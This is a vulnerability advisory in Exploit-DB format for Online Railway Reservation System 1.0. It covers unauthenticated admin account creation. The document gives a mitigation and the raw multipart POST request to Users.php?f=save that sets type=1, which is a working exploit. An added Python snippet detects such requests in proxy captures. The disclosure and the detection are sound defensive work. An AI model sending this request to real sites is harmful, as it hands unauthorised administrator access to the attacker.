Vendor: Online Railway Reservation System
By: Zachary Asher
CVSS: 8.8 (HIGH)
CWE: 264 (Account Creation)
Product Name: Online Railway Reservation System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:online_railway_reservation_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Online Railway Reservation System 1.0
Year: 2022

Online Railway Reservation System 1.0 – Admin Account Creation (Unauthenticated)

An unauthenticated user can create an admin account by sending a POST request to classes/Users.php?f=save with the required form fields (the request below sets type=1). The resulting account gives the user access to the admin panel of Online Railway Reservation System 1.0.

Mitigation:

The Users.php save handler should check server-side that the caller holds an authenticated administrator session before creating or modifying accounts, so that unauthenticated users cannot create admin accounts.

Exploit-DB raw data:

#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602

-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"

1
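As an added detection example (not part of the advisory or the project), the following Python parses a request shaped like the one above and flags a POST to Users.php?f=save that sets type=1 without any session cookie, the pattern a reviewer would look for in proxy or WAF captures. It assumes PHP's default PHPSESSID cookie name and treats type=1 as the admin role as the advisory's request implies; a cookie only shows that some session exists, so the server-side check described under Mitigation remains the actual fix.

```python
import re

SAVE_TARGET = "/orrs/classes/Users.php?f=save"  # the handler the advisory posts to
ADMIN_TYPE = "1"                                 # the advisory's request sends type=1
SESSION_COOKIE = "PHPSESSID"                     # assumption: default PHP session cookie name
BOUNDARY = "XyZ"                                 # constructed boundary, shorter than the advisory's

SAMPLE_REQUEST = (  # constructed sample: the advisory's path and fields, with no Cookie header
    "POST /orrs/classes/Users.php?f=save HTTP/1.1\r\n"
    "Host: localhost\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
    + "".join(
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
        for k, v in [("firstname", "testing"), ("lastname", "testing"),
                     ("username", "testing"), ("password", "testing"), ("type", "1")]
    )
    + f"--{BOUNDARY}--\r\n"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, request-target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for name, _, value in (line.partition(":") for line in lines[1:]):
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def parse_multipart(body, content_type):
    """Return {field name: value} for the text fields of a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)', content_type)
    if not m:
        return {}
    fields = {}
    for part in body.split("--" + m.group(1)):  # preamble and closing "--" have no name= and are skipped
        part_head, _, value = part.strip().partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = value
    return fields

def is_unauth_admin_creation(raw):
    """True when a POST to the save handler sets the admin type and carries no session cookie."""
    method, target, headers, body = parse_request(raw)
    if method != "POST" or target != SAVE_TARGET:
        return False
    fields = parse_multipart(body, headers.get("content-type", ""))
    return fields.get("type") == ADMIN_TYPE and SESSION_COOKIE not in headers.get("cookie", "")
```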